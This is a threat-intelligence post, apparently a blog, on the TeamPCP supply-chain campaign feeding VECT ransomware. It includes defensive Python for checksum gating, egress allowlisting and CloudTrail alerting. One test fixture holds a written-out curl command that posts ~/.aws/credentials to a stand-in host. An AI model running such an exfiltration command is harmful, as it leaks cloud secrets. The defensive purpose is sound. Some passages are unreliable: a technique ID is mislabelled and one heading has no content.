The Federal Bureau of Investigation (FBI) and researchers from Sophos have issued urgent warnings about a new, highly efficient cybercrime partnership between the VECT ransomware-as-a-service (RaaS) group and TeamPCP, a criminal gang known for large-scale software supply chain compromises. This alliance creates an "industrialized ransomware" model where TeamPCP steals developer credentials (cloud tokens, SSH keys, etc.) en masse by compromising popular developer tools, and then funnels these credentials to VECT affiliates for ransomware deployment. This streamlined process from credential theft to extortion significantly increases the speed, scale, and risk of ransomware attacks for any organization whose developers use the compromised tools. The FBI's FLASH alert highlights that TeamPCP has already targeted tools like Trivy, KICS, and LiteLLM, putting countless downstream organizations at immediate risk.
This collaboration represents a major shift in the ransomware ecosystem, moving towards a more specialized and efficient assembly-line process.
Sophos has already confirmed at least one VECT ransomware attack that used credentials stolen by TeamPCP, proving this industrialized model is operational.
TeamPCP's methodology for credential harvesting is sophisticated and difficult to detect. Their TTPs include:
- T1195.001 (Supply Chain Compromise: Compromise Software Dependencies and Development Tools): They compromise open-source software repositories or packages for popular developer tools. The FBI alert specifically names Trivy, KICS, and LiteLLM as having been targeted.
- T1500: By modifying these tools, they inject malicious code that executes within the developer's CI/CD pipeline. This environment is often highly privileged, with access to numerous production secrets.
- T1552 (Unsecured Credentials): The malicious code is designed to scan for and exfiltrate sensitive data, including cloud access tokens, SSH keys, and Kubernetes secrets.

Once these credentials are stolen, they are passed to VECT affiliates. The VECT ransomware operators then use these credentials for:
- T1078.004 (Valid Accounts: Cloud Accounts): They use the stolen cloud tokens to access the victim's cloud environment, exfiltrate data, and deploy ransomware on cloud-based systems.
- T1486 (Data Encrypted for Impact): The final stage involves deploying the VECT ransomware to encrypt critical systems and demand a ransom.

The industrialization of this attack chain has several critical implications:
No specific file hashes, IPs, or domains were listed in the provided articles.
Detecting this threat requires focusing on the CI/CD pipeline and cloud environment:
- Dynamic Analysis
- Service Binary Verification
- Outbound Traffic Filtering

FBI alert confirms TeamPCP supply chain attacks impacted over 1,000 cloud environments, adding Telnyx Python SDK to compromised tools and providing new hunting hints.
Verifying the digital signatures of software dependencies and development tools can help detect tampering or compromise.
Strictly limit the permissions of CI/CD service accounts and use short-lived credentials to minimize the impact of a credential theft.
Implement strict egress filtering from build environments to prevent malicious code from exfiltrating stolen credentials.
Run build jobs in ephemeral, isolated containers with no access to the underlying host or other network resources beyond what is absolutely necessary.
To counter supply chain attacks targeting tools like Trivy, organizations must implement strict verification of all third-party software used in their CI/CD pipelines. Before ingestion, verify the checksums (SHA-256) of all binaries and packages against the official values published by the vendor. Where possible, enforce policies that only allow the use of digitally signed tools and libraries from trusted publishers. This process should be automated within the artifact repository or at the start of the build pipeline to ensure that no tampered or malicious versions of tools like Trivy or KICS are ever executed in the environment.
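The ingestion gate described above, as an added example that is not code from the FBI alert, Sophos, or the Trivy project. It assumes the common `sha256sum`-style checksum list that many release pages publish (`<64-hex digest><two spaces><filename>` per line); the artifact bytes, filenames and the "vendor" checksum list in `demo()` are constructed for this example.

```python
"""Gate a third-party build tool on its vendor-published SHA-256 checksum
before the pipeline is allowed to execute it.

Added example, not code from the FBI alert, Sophos, or the Trivy project.
Assumes a `sha256sum`-style checksum list; everything in demo() is constructed.
"""
from __future__ import annotations

import hashlib
import hmac
import tempfile
from pathlib import Path


def parse_checksum_list(text: str) -> dict[str, str]:
    """Parse `sha256sum`-style output into {filename: hex digest}.

    Every non-empty line must be well formed; a truncated or edited
    checksum file fails the whole check instead of silently shrinking.
    """
    digests: dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            raise ValueError(f"malformed checksum line {lineno}: {raw!r}")
        digest, name = parts[0].lower(), parts[1].lstrip("*")  # '*' marks binary mode
        if len(digest) != 64 or set(digest) - set("0123456789abcdef"):
            raise ValueError(f"invalid SHA-256 digest on line {lineno}")
        digests[name] = digest
    return digests


def sha256_file(path: Path) -> str:
    """Stream the file so large tool tarballs are not read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_artifact(path: Path, checksums: dict[str, str]) -> bool:
    """True only if `path.name` is listed and its digest matches (fail closed).

    A file missing from the vendor's list is untrusted, not "unknown":
    a swapped-in artifact under a new name must not slip through.
    """
    expected = checksums.get(path.name)
    if expected is None:
        return False
    return hmac.compare_digest(sha256_file(path), expected)


def demo() -> dict[str, bool]:
    """Check a pristine, a tampered and an unlisted artifact (all constructed)."""
    good_payload = b"#!/bin/sh\necho 'constructed stand-in for a scanner binary'\n"
    # Constructed tampered copy: same filename, credential-stealing line appended.
    tampered_payload = good_payload + b"curl -s https://exfil.invalid -d @$HOME/.aws/credentials\n"
    name = "scanner_0.0.0_Linux-64bit.tar.gz"  # constructed release filename
    # Constructed "vendor" checksum list covering only the pristine artifact.
    checksums = parse_checksum_list(f"{hashlib.sha256(good_payload).hexdigest()}  {name}\n")
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "pristine").mkdir()
        (root / "tampered").mkdir()
        pristine = root / "pristine" / name
        tampered = root / "tampered" / name          # same name, modified bytes
        unlisted = root / "other_tool_0.0.0.tar.gz"  # not on the vendor's list
        pristine.write_bytes(good_payload)
        tampered.write_bytes(tampered_payload)
        unlisted.write_bytes(good_payload)
        return {
            "pristine": verify_artifact(pristine, checksums),
            "tampered": verify_artifact(tampered, checksums),
            "unlisted": verify_artifact(unlisted, checksums),
        }


if __name__ == "__main__":
    print(demo())
```

Two caveats when wiring this into a pipeline: a checksum file fetched from the same release page as the artifact only detects tampering in transit, not a compromised release, so where the vendor signs the checksum list, verify that signature first; and once a digest has been verified, pin it in your own pipeline configuration so a later change to the vendor's published list cannot silently move the goalposts.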
A critical defense against the credential exfiltration performed by compromised tools is to enforce a default-deny egress policy on all CI/CD build environments. Build agents should be firewalled to prevent all outbound network connections, except to a small, explicitly defined allowlist of required services (e.g., github.com, pypi.org, internal artifactories). This prevents the malicious code injected by TeamPCP from calling home to its C2 server to exfiltrate stolen SSH keys and cloud tokens. This simple but powerful control effectively breaks the attack chain at the point of data theft.
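The default-deny allowlist described above, modelled as a policy engine in an added example that is not from the FBI alert or Sophos report. The allowlist entries, the internal mirror name (`artifactory.build.internal`), the proxy log format and the destinations in `SAMPLE_LOG` are all constructed for this example.

```python
"""Default-deny egress policy for CI build agents, evaluated over a
constructed proxy log of outbound connection attempts.

Added example, not from the FBI alert or Sophos report. Allowlist entries,
the internal mirror name, the log format and SAMPLE_LOG are constructed.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    host: str   # exact hostname, or "*.example.com" for any subdomain (not the apex)
    port: int

    def matches(self, host: str, port: int) -> bool:
        if port != self.port:
            return False
        if self.host.startswith("*."):
            # Suffix match on ".example.com". A prefix or substring match
            # would let "example.com.attacker.test" through.
            return host.endswith(self.host[1:])
        return host == self.host


# Constructed allowlist. pip resolves packages on pypi.org but downloads the
# files from files.pythonhosted.org, so allowing pypi.org alone breaks builds.
ALLOWLIST = (
    Rule("github.com", 443),
    Rule("api.github.com", 443),
    Rule("*.githubusercontent.com", 443),
    Rule("pypi.org", 443),
    Rule("files.pythonhosted.org", 443),
    Rule("artifactory.build.internal", 443),  # assumed internal mirror name
)


def is_allowed(host: str, port: int, allowlist=ALLOWLIST) -> bool:
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host.strip("[]"))
        return False   # raw IP literals sidestep DNS-based controls; never allowed
    except ValueError:
        pass
    return any(rule.matches(host, port) for rule in allowlist)


# Constructed proxy log format: "<timestamp> <agent> CONNECT <host>:<port>"
LOG_LINE = re.compile(r"^(?P<ts>\S+) (?P<agent>\S+) CONNECT (?P<host>\S+):(?P<port>\d+)$")

SAMPLE_LOG = [
    "2026-04-02T10:01:02Z runner-7 CONNECT pypi.org:443",
    "2026-04-02T10:01:03Z runner-7 CONNECT files.pythonhosted.org:443",
    "2026-04-02T10:01:09Z runner-7 CONNECT raw.githubusercontent.com:443",
    "2026-04-02T10:01:11Z runner-7 CONNECT github.com:22",                 # SSH not listed
    "2026-04-02T10:01:40Z runner-7 CONNECT github.com.attacker.test:443",  # lookalike
    "2026-04-02T10:01:41Z runner-7 CONNECT 203.0.113.10:443",              # raw IP
    "2026-04-02T10:01:42Z runner-7 CONNECT paste.example.net:443",         # unknown host
    "2026-04-02T10:01:43Z runner-7 CONNECT dns.google:443",                # DoH tunnel
]


def audit(log_lines):
    """Return (host, port, decision) per line; each DENY is an alert signal."""
    decisions = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable log line: {line!r}")
        host, port = m["host"], int(m["port"])
        decisions.append((host, port, "ALLOW" if is_allowed(host, port) else "DENY"))
    return decisions


def denied(log_lines):
    return [(h, p) for h, p, d in audit(log_lines) if d == "DENY"]


if __name__ == "__main__":
    for row in audit(SAMPLE_LOG):
        print(*row)
```

In production the decision is enforced at the network layer (an egress proxy, security groups, or a Kubernetes NetworkPolicy with an explicit egress section), but the two properties shown here carry over: match hostnames by exact value or by suffix, never by prefix, and treat every denied attempt from a build agent as an incident in its own right, since a legitimate build has no reason to reach an unlisted host.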
Given that TeamPCP provides stolen cloud credentials to VECT, continuous monitoring of cloud account activity is essential. Implement real-time monitoring of cloud audit logs (e.g., AWS CloudTrail) and configure alerts for high-risk activities associated with compromised keys. Key events to monitor include: a credential being used from a new or anomalous geographic location, a service account performing user-like enumeration activities (List*, Describe*, Get*), or any attempt to escalate privileges or create new users. This allows for rapid detection of a VECT affiliate attempting to use the stolen credentials, providing a chance to disable the key and respond before ransomware is deployed.
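The three alert conditions above (new source location, enumeration by a service credential, privilege escalation), run over CloudTrail-style records in an added example that is not from the FBI alert or Sophos report. The records, baseline and thresholds are constructed: `AKIAIOSFODNN7EXAMPLE` is AWS's documented placeholder key id, and `198.51.100.0/24` and `203.0.113.0/24` are RFC 5737 documentation ranges. Only the CloudTrail fields the rules read are present, and delivery of real records from S3 or EventBridge is not shown.

```python
"""Three detections over CloudTrail-style records for a stolen CI credential
being driven by a ransomware affiliate: first use from outside the runner's
known source range, an enumeration burst, and IAM privilege escalation.

Added example, not from the FBI alert or Sophos report. RECORDS, BASELINE
and the thresholds are constructed; the key id and IP ranges are documentation
placeholders.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed baseline: the CI runner's egress NAT range for each access key.
BASELINE = {"AKIAIOSFODNN7EXAMPLE": [ipaddress.ip_network("198.51.100.0/24")]}

ENUM_PREFIXES = ("List", "Describe", "Get")
IAM_PRIVESC = {
    "CreateUser", "CreateAccessKey", "CreateLoginProfile", "AttachUserPolicy",
    "AttachRolePolicy", "PutUserPolicy", "PutRolePolicy",
    "UpdateAssumeRolePolicy", "AddUserToGroup",
}


def _event(ts, name, source, ip, key="AKIAIOSFODNN7EXAMPLE"):
    return {"eventTime": ts, "eventName": name, "eventSource": source,
            "sourceIPAddress": ip, "userIdentity": {"accessKeyId": key}}


# Constructed records: one normal pipeline call, then the same key used from
# a new address to enumerate the account and mint a backdoor IAM user.
RECORDS = [
    _event("2026-04-02T10:00:00Z", "GetObject", "s3.amazonaws.com", "198.51.100.7"),
    _event("2026-04-02T10:05:10Z", "GetCallerIdentity", "sts.amazonaws.com", "203.0.113.44"),
    _event("2026-04-02T10:05:15Z", "ListBuckets", "s3.amazonaws.com", "203.0.113.44"),
    _event("2026-04-02T10:05:20Z", "DescribeInstances", "ec2.amazonaws.com", "203.0.113.44"),
    _event("2026-04-02T10:05:30Z", "ListSecrets", "secretsmanager.amazonaws.com", "203.0.113.44"),
    _event("2026-04-02T10:05:41Z", "ListRoles", "iam.amazonaws.com", "203.0.113.44"),
    _event("2026-04-02T10:05:55Z", "DescribeDBInstances", "rds.amazonaws.com", "203.0.113.44"),
    _event("2026-04-02T10:07:00Z", "CreateUser", "iam.amazonaws.com", "203.0.113.44"),
]


def _ts(s: str) -> datetime:
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def detect(records, baseline=BASELINE, enum_threshold=5, window=timedelta(minutes=10)):
    alerts = []
    new_ip_fired, burst_fired = set(), set()
    enum_times = defaultdict(list)  # access key -> timestamps of List*/Describe*/Get* calls

    for r in sorted(records, key=lambda r: _ts(r["eventTime"])):
        key = r["userIdentity"].get("accessKeyId", "")
        name, when = r["eventName"], _ts(r["eventTime"])

        # 1. Known key used from outside its baseline range (fires once per key).
        # CloudTrail puts a service DNS name (e.g. "ec2.amazonaws.com") in
        # sourceIPAddress for AWS-internal calls; those are skipped here.
        try:
            ip = ipaddress.ip_address(r["sourceIPAddress"])
        except ValueError:
            ip = None
        known = baseline.get(key)
        if ip and known and key not in new_ip_fired and not any(ip in n for n in known):
            new_ip_fired.add(key)
            alerts.append({"rule": "new_source_ip", "key": key, "ip": str(ip), "event": name})

        # 2. Enumeration burst: >= threshold read-only calls inside a sliding window.
        if name.startswith(ENUM_PREFIXES):
            times = enum_times[key]
            times.append(when)
            while when - times[0] > window:
                times.pop(0)
            if len(times) >= enum_threshold and key not in burst_fired:
                burst_fired.add(key)
                alerts.append({"rule": "enumeration_burst", "key": key,
                               "count": len(times), "event": name})

        # 3. IAM calls that create or escalate a principal (fires per call).
        if r["eventSource"] == "iam.amazonaws.com" and name in IAM_PRIVESC:
            alerts.append({"rule": "privilege_escalation", "key": key, "event": name})

    return alerts


if __name__ == "__main__":
    for a in detect(RECORDS):
        print(a)
```

The enumeration threshold and window are starting points to tune against a real baseline of what each pipeline key normally calls; the first `new_source_ip` alert on a CI key is already sufficient reason to deactivate it (`aws iam update-access-key --status Inactive`) and rotate, rather than waiting for the burst or the IAM write to confirm the intent.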
TeamPCP's attack on Aqua Security's Trivy vulnerability scanner results in the theft of over 500,000 credentials.
Sophos publishes a report detailing the partnership between VECT and TeamPCP.
The FBI issues a FLASH alert warning about TeamPCP's supply chain compromises.

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.